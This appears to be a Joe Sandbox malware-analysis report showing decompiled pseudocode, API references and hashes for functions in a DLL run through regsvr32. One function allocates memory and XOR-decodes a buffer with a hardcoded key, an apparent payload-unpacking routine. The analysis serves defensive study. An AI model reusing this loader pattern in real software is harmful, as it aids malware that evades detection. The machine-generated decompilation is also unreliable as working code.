                                                                                                      • Opcode ID: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
                                                                                                      • Instruction ID: adc8a36824eadd71f02102c790ca36482a1caa161b7001f99f69deea366e0896
                                                                                                      • Opcode Fuzzy Hash: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
                                                                                                      • Instruction Fuzzy Hash: D851FD2262DB8585DB60DB51E4513AAB3A0FBCA7C0F504175EADD87B6ADF3CD4908B10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 45%
                                                                                                      			E00007FF87FF87C101910(signed char __edx, intOrPtr* __rax, long long __rcx, long long __r8, long long _a8, signed char _a16, long long _a24) {
                                                                                                      				long long _v16;
                                                                                                      				long long _v24;
                                                                                                      				long long _v32;
                                                                                                      				long long _v40;
                                                                                                      				void* _t32;
                                                                                                      				intOrPtr* _t47;
                                                                                                      				long long* _t49;
                                                                                                      
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __edx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				if ((_a16 & 0x000000ff) != 0) goto 0x7c101930;
                                                                                                      				goto 0x7c1019f1;
                                                                                                      				E00007FF87FF87C102150(__rax, _a8);
                                                                                                      				if ( *((long long*)(__rax)) - 0x10 < 0) goto 0x7c1019f1;
                                                                                                      				E00007FF87FF87C102190(_a8);
                                                                                                      				_t47 =  *((intOrPtr*)(__rax));
                                                                                                      				_v40 = _t47;
                                                                                                      				E00007FF87FF87C102BC0(E00007FF87FF87C102190(_a8), _t47);
                                                                                                      				_v32 = _t47;
                                                                                                      				E00007FF87FF87C101850(_a8);
                                                                                                      				_t32 = E00007FF87FF87C102BD0(_t47, _v32);
                                                                                                      				if (_a24 <= 0) goto 0x7c1019bd;
                                                                                                      				E00007FF87FF87C102C00(_t32, _v40);
                                                                                                      				_v24 = _t47;
                                                                                                      				E00007FF87FF87C102190(_a8);
                                                                                                      				E00007FF87FF87C1011E0(_t47, _v24, _a24);
                                                                                                      				E00007FF87FF87C102150(_t47, _a8);
                                                                                                      				_t49 =  *_t47 + 1;
                                                                                                      				_v16 = _t49;
                                                                                                      				E00007FF87FF87C101850(_a8);
                                                                                                      				E00007FF87FF87C102100(_t49, _v40, _v16); // executed
                                                                                                      				E00007FF87FF87C102150(_t49, _a8);
                                                                                                      				 *_t49 = 0xf;
                                                                                                      				return E00007FF87FF87C1023A0(_t49, _a8, _a24);
                                                                                                      			}










                                                                                                      0x7ff87c101910
                                                                                                      0x7ff87c101915
                                                                                                      0x7ff87c101919
                                                                                                      0x7ff87c101929
                                                                                                      0x7ff87c10192b
                                                                                                      0x7ff87c101935
                                                                                                      0x7ff87c10193e
                                                                                                      0x7ff87c101949
                                                                                                      0x7ff87c10194e
                                                                                                      0x7ff87c101951
                                                                                                      0x7ff87c101963
                                                                                                      0x7ff87c101968
                                                                                                      0x7ff87c101972
                                                                                                      0x7ff87c101982
                                                                                                      0x7ff87c10198d
                                                                                                      0x7ff87c101994
                                                                                                      0x7ff87c101999
                                                                                                      0x7ff87c1019a3
                                                                                                      0x7ff87c1019b8
                                                                                                      0x7ff87c1019c2
                                                                                                      0x7ff87c1019ca
                                                                                                      0x7ff87c1019cd
                                                                                                      0x7ff87c1019d7
                                                                                                      0x7ff87c1019ec
                                                                                                      0x7ff87c1019f6
                                                                                                      0x7ff87c1019fb
                                                                                                      0x7ff87c101a15

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::EmptyQueue::StructuredWork$_aligned_msizechar_traitstype_info::_name_internal_method
                                                                                                      • String ID:
                                                                                                      • API String ID: 2899389904-0
                                                                                                      • Opcode ID: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
                                                                                                      • Instruction ID: 01564554e5b28350710ba750008cbc32fb7b7860682d9ad7baf10f4f01583375
                                                                                                      • Opcode Fuzzy Hash: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
                                                                                                      • Instruction Fuzzy Hash: CD21BE23A2CA8181DB10EB52E89137EA760FBCABD0F100075FA9D4775ADE7CD5C08B50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 79%
                                                                                                      			E00007FF87FF87C1013A0(signed int __eax, long long __rcx, signed int __rdx, signed long long __r8, long long _a8, signed int _a16, signed long long _a24) {
                                                                                                      				void* _v16;
                                                                                                      				signed long long _v24;
                                                                                                      				long long _v32;
                                                                                                      				signed int _v40;
                                                                                                      
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				if (_a16 - 0xffffffff <= 0) goto 0x7c1013cd;
                                                                                                      				E00007FF87FF87C109764();
                                                                                                      				_v24 = _a16 * _a24;
                                                                                                      				if (_v24 - 0x1000 < 0) goto 0x7c101475;
                                                                                                      				_v40 = _a8;
                                                                                                      				if ((_v40 & 0x0000001f) == 0) goto 0x7c101409;
                                                                                                      				E00007FF87FF87C109764();
                                                                                                      				_v16 = _v40 - 8;
                                                                                                      				_v32 =  *_v16;
                                                                                                      				if (_v32 - _v40 < 0) goto 0x7c101435;
                                                                                                      				E00007FF87FF87C109764();
                                                                                                      				if (_v40 - _v32 - 8 >= 0) goto 0x7c101450;
                                                                                                      				E00007FF87FF87C109764();
                                                                                                      				if (_v40 - _v32 - 0x27 <= 0) goto 0x7c10146b;
                                                                                                      				E00007FF87FF87C109764();
                                                                                                      				_a8 = _v32;
                                                                                                      				0x7c104184(); // executed
                                                                                                      				return __eax / _a24;
                                                                                                      			}







                                                                                                      0x7ff87c1013a0
                                                                                                      0x7ff87c1013a5
                                                                                                      0x7ff87c1013aa
                                                                                                      0x7ff87c1013c6
                                                                                                      0x7ff87c1013c8
                                                                                                      0x7ff87c1013d8
                                                                                                      0x7ff87c1013e6
                                                                                                      0x7ff87c1013f1
                                                                                                      0x7ff87c101402
                                                                                                      0x7ff87c101404
                                                                                                      0x7ff87c101412
                                                                                                      0x7ff87c10141f
                                                                                                      0x7ff87c10142e
                                                                                                      0x7ff87c101430
                                                                                                      0x7ff87c101449
                                                                                                      0x7ff87c10144b
                                                                                                      0x7ff87c101464
                                                                                                      0x7ff87c101466
                                                                                                      0x7ff87c101470
                                                                                                      0x7ff87c10147a
                                                                                                      0x7ff87c101483

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                      • String ID:
                                                                                                      • API String ID: 3668304517-0
                                                                                                      • Opcode ID: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
                                                                                                      • Instruction ID: 2fbf3b04e7706602a52c2d0bbc610608aec739f25d37051d984eedb1e3b58823
                                                                                                      • Opcode Fuzzy Hash: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
                                                                                                      • Instruction Fuzzy Hash: 84212A27628B8481DB20DB59F08021AB3A4F7897E4F100635FAED43BA9EF3CD1C08B10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 45%
                                                                                                      			E00007FF87FF87C119510(intOrPtr __edx, long long __rcx, void* __rdx, long long _a8, intOrPtr _a16) {
                                                                                                      				long long _v16;
                                                                                                      				long long _v24;
                                                                                                      				signed int _v28;
                                                                                                      				intOrPtr _v32;
                                                                                                      				signed int _v36;
                                                                                                      				intOrPtr _v40;
                                                                                                      				signed int _t35;
                                                                                                      				signed int _t48;
                                                                                                      				long long _t63;
                                                                                                      				intOrPtr _t64;
                                                                                                      				void* _t66;
                                                                                                      				void* _t76;
                                                                                                      				void* _t77;
                                                                                                      
                                                                                                      				_a16 = __edx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				_v24 = 0;
                                                                                                      				_t63 = "*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5";
                                                                                                      				_v16 = _t63;
                                                                                                      				_v32 = E00007FF87FF87C1091B8(_t63, _t66, L"64", _t76, _t77);
                                                                                                      				_v36 = E00007FF87FF87C1091B8(_t63, _t66, L"4096", _t76, _t77);
                                                                                                      				_t35 = E00007FF87FF87C1091B8(_t63, _t66, L"8192", _t76, _t77);
                                                                                                      				r9d = _v32;
                                                                                                      				r8d = _v36 | _t35;
                                                                                                      				VirtualAlloc(??, ??, ??, ??); // executed
                                                                                                      				_v24 = _t63;
                                                                                                      				if (_v24 != 0) goto 0x7c11958f;
                                                                                                      				goto 0x7c1195f4;
                                                                                                      				_v40 = 0;
                                                                                                      				goto 0x7c1195a3;
                                                                                                      				_v40 = _v40 + 1;
                                                                                                      				if (_v40 - _a16 >= 0) goto 0x7c1195ef;
                                                                                                      				_t64 = _v40;
                                                                                                      				_v28 =  *(_a8 + _t64) & 0x000000ff;
                                                                                                      				asm("cdq");
                                                                                                      				_t48 = _v28 ^  *(_v16 + _t64) & 0x000000ff;
                                                                                                      				 *(_v24 + _v40) = _t48;
                                                                                                      				goto 0x7c119599;
                                                                                                      				return _t48;
                                                                                                      			}
















                                                                                                      0x7ff87c119510
                                                                                                      0x7ff87c119514
                                                                                                      0x7ff87c11951d
                                                                                                      0x7ff87c119526
                                                                                                      0x7ff87c11952d
                                                                                                      0x7ff87c11953e
                                                                                                      0x7ff87c11954e
                                                                                                      0x7ff87c119559
                                                                                                      0x7ff87c11956e
                                                                                                      0x7ff87c119571
                                                                                                      0x7ff87c119578
                                                                                                      0x7ff87c11957e
                                                                                                      0x7ff87c119589
                                                                                                      0x7ff87c11958d
                                                                                                      0x7ff87c11958f
                                                                                                      0x7ff87c119597
                                                                                                      0x7ff87c11959f
                                                                                                      0x7ff87c1195ab
                                                                                                      0x7ff87c1195ad
                                                                                                      0x7ff87c1195bb
                                                                                                      0x7ff87c1195c3
                                                                                                      0x7ff87c1195de
                                                                                                      0x7ff87c1195ea
                                                                                                      0x7ff87c1195ed
                                                                                                      0x7ff87c1195f8

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID: *sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5$4096$8192
                                                                                                      • API String ID: 4275171209-3063897839
                                                                                                      • Opcode ID: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
                                                                                                      • Instruction ID: e9a9ad715c057057ade0bf07143933c39a8fcdf75caaabf5d5b4ed7076bdebec
                                                                                                      • Opcode Fuzzy Hash: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
                                                                                                      • Instruction Fuzzy Hash: E621E77262C681CBD764CB15E49072AB7A1F789794F40023AF68E83B59DF3CD5808F10
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00007FF87FF87C1012B0(signed int __eax, signed int __rcx, signed int __rdx, signed int _a8, signed int _a16, signed char _a24) {
                                                                                                      				long long _v16;
                                                                                                      				long long _v24;
                                                                                                      				signed long long _v32;
                                                                                                      				signed long long _v40;
                                                                                                      				void* _t40;
                                                                                                      				long long _t54;
                                                                                                      				signed long long _t57;
                                                                                                      				signed long long _t58;
                                                                                                      				void* _t60;
                                                                                                      
                                                                                                      				_a24 = r8b;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				_v40 = 0;
                                                                                                      				if (_a8 != 0) goto 0x7c1012de;
                                                                                                      				goto 0x7c101397;
                                                                                                      				_t42 = __eax % _a16;
                                                                                                      				if (0xffffffff - _a8 >= 0) goto 0x7c1012f8;
                                                                                                      				E00007FF87FF87C104E7C(__eax % _a16, 0xffffffff - _a8, 0xffffffff, _t60);
                                                                                                      				_v32 = _a8 * _a16;
                                                                                                      				if ((_a24 & 0x000000ff) == 0) goto 0x7c10137c;
                                                                                                      				if (_v32 - 0x1000 < 0) goto 0x7c10137c;
                                                                                                      				_v24 = _v32 + 0x27;
                                                                                                      				_t54 = _v32;
                                                                                                      				if (_v24 - _t54 > 0) goto 0x7c10133b;
                                                                                                      				E00007FF87FF87C104E7C(_t42, _v24 - _t54, _t54, _t60);
                                                                                                      				E00007FF87FF87C103D6C(_t54, _v24); // executed
                                                                                                      				_v16 = _t54;
                                                                                                      				E00007FF87FF87C109764();
                                                                                                      				_t57 = _v16 + 0x00000027 & 0xffffffe0;
                                                                                                      				_v40 = _t57;
                                                                                                      				_t58 = _t57 * 0xffffffff;
                                                                                                      				 *((long long*)(_v40 + _t58)) = _v16;
                                                                                                      				goto 0x7c101392;
                                                                                                      				_t40 = E00007FF87FF87C103D6C(_t58, _v32);
                                                                                                      				_v40 = _t58;
                                                                                                      				E00007FF87FF87C109764();
                                                                                                      				return _t40;
                                                                                                      			}












                                                                                                      0x7ff87c1012b0
                                                                                                      0x7ff87c1012b5
                                                                                                      0x7ff87c1012ba
                                                                                                      0x7ff87c1012c3
                                                                                                      0x7ff87c1012d2
                                                                                                      0x7ff87c1012d9
                                                                                                      0x7ff87c1012e7
                                                                                                      0x7ff87c1012f1
                                                                                                      0x7ff87c1012f3
                                                                                                      0x7ff87c101303
                                                                                                      0x7ff87c10130f
                                                                                                      0x7ff87c10131a
                                                                                                      0x7ff87c101325
                                                                                                      0x7ff87c10132a
                                                                                                      0x7ff87c101334
                                                                                                      0x7ff87c101336
                                                                                                      0x7ff87c101340
                                                                                                      0x7ff87c101345
                                                                                                      0x7ff87c10134c
                                                                                                      0x7ff87c10135a
                                                                                                      0x7ff87c10135e
                                                                                                      0x7ff87c101368
                                                                                                      0x7ff87c101376
                                                                                                      0x7ff87c10137a
                                                                                                      0x7ff87c101381
                                                                                                      0x7ff87c101386
                                                                                                      0x7ff87c10138d
                                                                                                      0x7ff87c10139b

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                      • String ID:
                                                                                                      • API String ID: 118556049-0
                                                                                                      • Opcode ID: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
                                                                                                      • Instruction ID: 374831deefdcd30a3488b8f31128646c69add048abd787ef68812ba9ef06b4a6
                                                                                                      • Opcode Fuzzy Hash: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
                                                                                                      • Instruction Fuzzy Hash: 9221F72252CB8581DB608B19E08032AB7A4FB897F4F104335E6ED47BE8DF6CD1D08B14
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 45%
                                                                                                      			E00007FF87FF87C10D748(void* __ebp, long long __rbx, long long __rdi, long long __rsi) {
                                                                                                      				void* _t25;
                                                                                                      				signed long long _t45;
                                                                                                      				signed long long _t47;
                                                                                                      				long long _t62;
                                                                                                      				signed long long _t63;
                                                                                                      				signed long long _t70;
                                                                                                      				void* _t71;
                                                                                                      				WCHAR* _t75;
                                                                                                      
                                                                                                      				_t45 = _t70;
                                                                                                      				 *((long long*)(_t45 + 8)) = __rbx;
                                                                                                      				 *((long long*)(_t45 + 0x10)) = _t62;
                                                                                                      				 *((long long*)(_t45 + 0x18)) = __rsi;
                                                                                                      				 *((long long*)(_t45 + 0x20)) = __rdi;
                                                                                                      				_t71 = _t70 - 0x40; // executed
                                                                                                      				GetEnvironmentStringsW(); // executed
                                                                                                      				if (_t45 != 0) goto 0x7c10d778;
                                                                                                      				goto 0x7c10d83b;
                                                                                                      				_t63 = _t45;
                                                                                                      				if ( *_t45 == 0) goto 0x7c10d79d;
                                                                                                      				_t47 = (_t45 | 0xffffffff) + 1;
                                                                                                      				if ( *((intOrPtr*)(_t63 + _t47 * 2)) != 0) goto 0x7c10d784;
                                                                                                      				if ( *((intOrPtr*)(_t63 + _t47 * 2 + 2)) != 0) goto 0x7c10d780;
                                                                                                      				 *((long long*)(_t71 + 0x38)) = __rsi;
                                                                                                      				 *((long long*)(_t71 + 0x30)) = __rsi;
                                                                                                      				r9d = __ebp;
                                                                                                      				 *((intOrPtr*)(_t71 + 0x28)) = 0;
                                                                                                      				 *(_t71 + 0x20) = __rsi;
                                                                                                      				E00007FF87FF87C10D698();
                                                                                                      				if (0 != 0) goto 0x7c10d7db;
                                                                                                      				FreeEnvironmentStringsW(_t75);
                                                                                                      				goto 0x7c10d771;
                                                                                                      				E00007FF87FF87C10AA18(_t47, 0); // executed
                                                                                                      				_t57 = _t47;
                                                                                                      				if (_t47 != 0) goto 0x7c10d7f4;
                                                                                                      				_t25 = E00007FF87FF87C10A9DC(_t47, 0);
                                                                                                      				goto 0x7c10d7d0;
                                                                                                      				 *((long long*)(_t71 + 0x38)) = __rsi;
                                                                                                      				r9d = __ebp;
                                                                                                      				 *((long long*)(_t71 + 0x30)) = __rsi;
                                                                                                      				 *((intOrPtr*)(_t71 + 0x28)) = r14d;
                                                                                                      				 *(_t71 + 0x20) = _t47;
                                                                                                      				E00007FF87FF87C10D698();
                                                                                                      				if (_t25 != 0) goto 0x7c10d825;
                                                                                                      				E00007FF87FF87C10A9DC(_t47, _t47);
                                                                                                      				goto 0x7c10d82f;
                                                                                                      				E00007FF87FF87C10A9DC(_t47, _t57);
                                                                                                      				return FreeEnvironmentStringsW(??);
                                                                                                      			}











                                                                                                      0x7ff87c10d748
                                                                                                      0x7ff87c10d74b
                                                                                                      0x7ff87c10d74f
                                                                                                      0x7ff87c10d753
                                                                                                      0x7ff87c10d757
                                                                                                      0x7ff87c10d75d
                                                                                                      0x7ff87c10d761
                                                                                                      0x7ff87c10d76f
                                                                                                      0x7ff87c10d773
                                                                                                      0x7ff87c10d778
                                                                                                      0x7ff87c10d77e
                                                                                                      0x7ff87c10d784
                                                                                                      0x7ff87c10d78c
                                                                                                      0x7ff87c10d79b
                                                                                                      0x7ff87c10d79d
                                                                                                      0x7ff87c10d7a5
                                                                                                      0x7ff87c10d7b4
                                                                                                      0x7ff87c10d7b7
                                                                                                      0x7ff87c10d7bd
                                                                                                      0x7ff87c10d7c4
                                                                                                      0x7ff87c10d7ce
                                                                                                      0x7ff87c10d7d3
                                                                                                      0x7ff87c10d7d9
                                                                                                      0x7ff87c10d7de
                                                                                                      0x7ff87c10d7e3
                                                                                                      0x7ff87c10d7e9
                                                                                                      0x7ff87c10d7ed
                                                                                                      0x7ff87c10d7f2
                                                                                                      0x7ff87c10d7f4
                                                                                                      0x7ff87c10d7f9
                                                                                                      0x7ff87c10d7fc
                                                                                                      0x7ff87c10d804
                                                                                                      0x7ff87c10d80d
                                                                                                      0x7ff87c10d812
                                                                                                      0x7ff87c10d819
                                                                                                      0x7ff87c10d81e
                                                                                                      0x7ff87c10d823
                                                                                                      0x7ff87c10d827
                                                                                                      0x7ff87c10d855

                                                                                                      APIs
                                                                                                      • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF87C10A08B), ref: 00007FF87C10D761
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF87C10A08B), ref: 00007FF87C10D7D3
                                                                                                        • Part of subcall function 00007FF87C10AA18: RtlAllocateHeap.NTDLL(?,?,?,00007FF87C11040D,?,?,00000000,00007FF87C10D8B7,?,?,?,00007FF87C10A427,?,?,?,00007FF87C10A31D), ref: 00007FF87C10AA56
                                                                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF87C10A08B), ref: 00007FF87C10D832
                                                                                                        • Part of subcall function 00007FF87C10A9DC: RtlReleasePrivilege.NTDLL(?,?,00000000,00007FF87C10F492,?,?,?,00007FF87C10F4CF,?,?,00000000,00007FF87C10F144,?,?,?,00007FF87C10F077), ref: 00007FF87C10A9F2
                                                                                                        • Part of subcall function 00007FF87C10A9DC: GetLastError.KERNEL32(?,?,00000000,00007FF87C10F492,?,?,?,00007FF87C10F4CF,?,?,00000000,00007FF87C10F144,?,?,?,00007FF87C10F077), ref: 00007FF87C10A9FC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320061148.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_3_2_7ff87c100000_regsvr32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentStrings$Free$AllocateErrorHeapLastPrivilegeRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 2360715157-0
                                                                                                      • Opcode ID: 375de5473a6635352b8acb40982912ac5787743cf0a9cf01d580d03713d4213a
                                                                                                      • Instruction ID: 1e635aa7bf36b806126f7d4942beb0399dd823243bf42b51ac4e16bac870a23b
                                                                                                      • Opcode Fuzzy Hash: 375de5473a6635352b8acb40982912ac5787743cf0a9cf01d580d03713d4213a
                                                                                                      • Instruction Fuzzy Hash: 5931D623A28B5685E724BF22E44027A77A4BF46BD8F484135EA6E13BC5DF3CE0C18310
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 58%
                                                                                                      			E00007FF87FF87C102970(void* __edx, void* __eflags, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                      				signed int _v16;
                                                                                                      				char _v48;
                                                                                                      				long long _v56;
                                                                                                      				signed long long _v64;
                                                                                                      				signed int _v72;
                                                                                                      				void* _t35;
                                                                                                      				void* _t37;
                                                                                                      				signed long long _t39;
                                                                                                      				signed long long _t40;
                                                                                                      				signed long long _t61;
                                                                                                      
                                                                                                      				_t37 = __eflags;
                                                                                                      				_t36 = __edx;
                                                                                                      				_a24 = __r8;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				_v56 = 0xfffffffe;
                                                                                                      				_t39 =  *0x7c17e008; // 0xefd957cda2cd
                                                                                                      				_t40 = _t39 ^ _t61;
                                                                                                      				_v16 = _t40;
                                                                                                      				_v72 = 0;
                                                                                                      				E00007FF87FF87C101760(__edx,  &_v48);
                                                                                                      				E00007FF87FF87C101490(_t40, _a16);
                                                                                                      				_v64 = _t40;
                                                                                                      				E00007FF87FF87C1011A0(_a24);
                                                                                                      				E00007FF87FF87C102CC0(__edx, _t37, _v64 + _t40,  &_v48, _v64 + _t40, __r8); // executed
                                                                                                      				E00007FF87FF87C102E90( &_v48, _a16);
                                                                                                      				E00007FF87FF87C102E60( &_v48, _a24);
                                                                                                      				E00007FF87FF87C1016A0(__edx, _v64 + _t40, _a8,  &_v48);
                                                                                                      				_v72 = _v72 | 0x00000001;
                                                                                                      				return E00007FF87FF87C103A70(E00007FF87FF87C101540( &_v48), _t35, _t36, _v16 ^ _t61);
                                                                                                      			}













                                                                                                      0x7ff87c102970
                                                                                                      0x7ff87c102970
                                                                                                      0x7ff87c102970
                                                                                                      0x7ff87c102975
                                                                                                      0x7ff87c10297a
                                                                                                      0x7ff87c102983
                                                                                                      0x7ff87c10298c
                                                                                                      0x7ff87c102993
                                                                                                      0x7ff87c102996
                                                                                                      0x7ff87c10299b
                                                                                                      0x7ff87c1029a8
                                                                                                      0x7ff87c1029b3
                                                                                                      0x7ff87c1029b8
                                                                                                      0x7ff87c1029c5
                                                                                                      0x7ff87c1029dd
                                                                                                      0x7ff87c1029ec
                                                                                                      0x7ff87c1029fe
                                                                                                      0x7ff87c102a0d
                                                                                                      0x7ff87c102a19
                                                                                                      0x7ff87c102a3d

                                                                                                      APIs
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C1029C5
                                                                                                      • type_info::_name_internal_method.LIBCMTD ref: 00007FF87C1029EC
                                                                                                      • type_info::_name_internal_method.LIBCMTD ref: 00007FF87C1029FE
                                                                                                        • Part of subcall function 00007FF87C1016A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1016BC
                                                                                                        • Part of subcall function 00007FF87C101540: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C101567
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000003.00000002.319732788.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000003.00000002.319720606.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.319807527.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320036966.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320042986.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000003.00000002.320055373.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
